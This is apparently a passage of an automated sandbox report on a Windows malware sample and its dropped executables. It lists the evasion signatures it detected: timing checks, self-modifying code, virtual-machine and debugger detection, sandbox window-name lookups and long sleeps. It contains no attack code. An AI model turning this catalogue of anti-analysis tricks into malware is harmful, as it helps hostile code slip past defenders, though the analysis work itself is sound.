Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: BAF2AB second address: BAEBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FA67D080296h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 stc 0x00000014 push dword ptr [ebp+122D01FDh] 0x0000001a or dword ptr [ebp+122D222Ch], eax 0x00000020 call dword ptr [ebp+122D36FCh] 0x00000026 pushad 0x00000027 add dword ptr [ebp+122D2181h], esi 0x0000002d xor eax, eax 0x0000002f jmp 00007FA67D08029Fh 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D2181h], eax 0x0000003e mov dword ptr [ebp+122D3AC0h], eax 0x00000044 jno 00007FA67D0802A3h 0x0000004a sub dword ptr [ebp+122D255Fh], ecx 0x00000050 mov esi, 0000003Ch 0x00000055 stc 0x00000056 mov dword ptr [ebp+122D255Fh], edi 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D2181h], ecx 0x00000066 lodsw 0x00000068 pushad 0x00000069 sub ax, BFBAh 0x0000006e sbb edx, 54EC89E5h 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 jmp 00007FA67D08029Ah 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jnc 00007FA67D0802AEh 0x00000088 push eax 0x00000089 pushad 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: D2175E second address: D2176A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FA67C81A866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6BEB48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6BEC0F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 85D3EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BAEB48 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BAEC0F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D4D3EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Special instruction interceptor: First address: 13C4BF0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Special instruction interceptor: First address: 13C20DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Special instruction interceptor: First address: 155B9CA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Special instruction interceptor: First address: 156BB49 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Special instruction interceptor: First address: 15E450F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 86C922 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 86A1F6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: A3155A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: AA2459 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Special instruction interceptor: First address: 117FA12 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Special instruction interceptor: First address: 132F96D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Special instruction interceptor: First address: 117F9EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Special instruction interceptor: First address: 13B77C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Special instruction interceptor: First address: F3DA58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Special instruction interceptor: First address: 10D04EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Special instruction interceptor: First address: 10FBF5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Special instruction interceptor: First address: 1168657 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Special instruction interceptor: First address: F40591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Special instruction interceptor: First address: F40904 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 626DA58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 64004EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 642BF5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 6498657 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Special instruction interceptor: First address: 634DA58 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Memory allocated: 4E10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Memory allocated: 5130000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Memory allocated: 7130000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Memory allocated: 4740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Memory allocated: 49F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Memory allocated: 69F0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04AE05B4 rdtsc 0_2_04AE05B4
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1578 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1723 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1680 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window / User API: threadDelayed 706 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window / User API: threadDelayed 850 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window / User API: threadDelayed 913 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window / User API: threadDelayed 1330 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window / User API: threadDelayed 878 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Window / User API: threadDelayed 853 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Window / User API: threadDelayed 719
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep count: 44 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700 Thread sleep time: -88044s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep count: 59 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep time: -118059s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep count: 1578 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -3157578s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 1723 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -3447723s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7660 Thread sleep count: 285 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7660 Thread sleep time: -8550000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692 Thread sleep count: 1680 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692 Thread sleep time: -3361680s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7892 Thread sleep count: 706 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7892 Thread sleep time: -1412706s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7900 Thread sleep count: 850 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7900 Thread sleep time: -1700850s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7896 Thread sleep count: 913 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7896 Thread sleep time: -1826913s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7884 Thread sleep count: 1330 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7884 Thread sleep time: -2661330s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7888 Thread sleep count: 878 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7888 Thread sleep time: -1756878s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7912 Thread sleep count: 853 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe TID: 7912 Thread sleep time: -1706853s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 8144 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 8124 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 6312 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 6456 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 8120 Thread sleep time: -68034s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 8116 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 8132 Thread sleep time: -64032s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 5744 Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 3688 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 5052 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 344 Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe TID: 3604 Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe TID: 3604 Thread sleep count: 152 > 30
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 6096 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 2736 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 7572 Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 1808 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 560 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 5644 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe TID: 5268 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe TID: 7432 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe TID: 6044 Thread sleep count: 719 > 30
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe TID: 6044 Thread sleep count: 180 > 30
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe TID: 6440 Thread sleep count: 121 > 30
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe TID: 6440 Thread sleep count: 145 > 30
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: skotes.exe, skotes.exe, 00000002.00000002.1759513034.0000000000D32000.00000040.00000001.01000000.00000008.sdmp, 86526d7b20.exe, 86526d7b20.exe, 0000000A.00000002.2689532342.0000000001307000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2235d4f703.exe, 0000000B.00000003.3009828676.000000000139C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.0000000000722000.00000004.00000020.00020000.00000000.sdmp, 86526d7b20.exe, 0000000A.00000002.2688574615.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, 2235d4f703.exe, 0000000B.00000003.3009828676.000000000139C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 86526d7b20.exe, 0000000A.00000002.2688574615.00000000006AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.1700371307.0000000000C87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}00Z
Source: file.exe, 00000000.00000002.1735148781.0000000000842000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1759536292.0000000000D32000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1759513034.0000000000D32000.00000040.00000001.01000000.00000008.sdmp, 86526d7b20.exe, 0000000A.00000002.2689532342.0000000001307000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe File opened: SIWVID
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe System information queried: KernelDebuggerInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04AE05B4 rdtsc 0_2_04AE05B4
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Process token adjusted: Debug
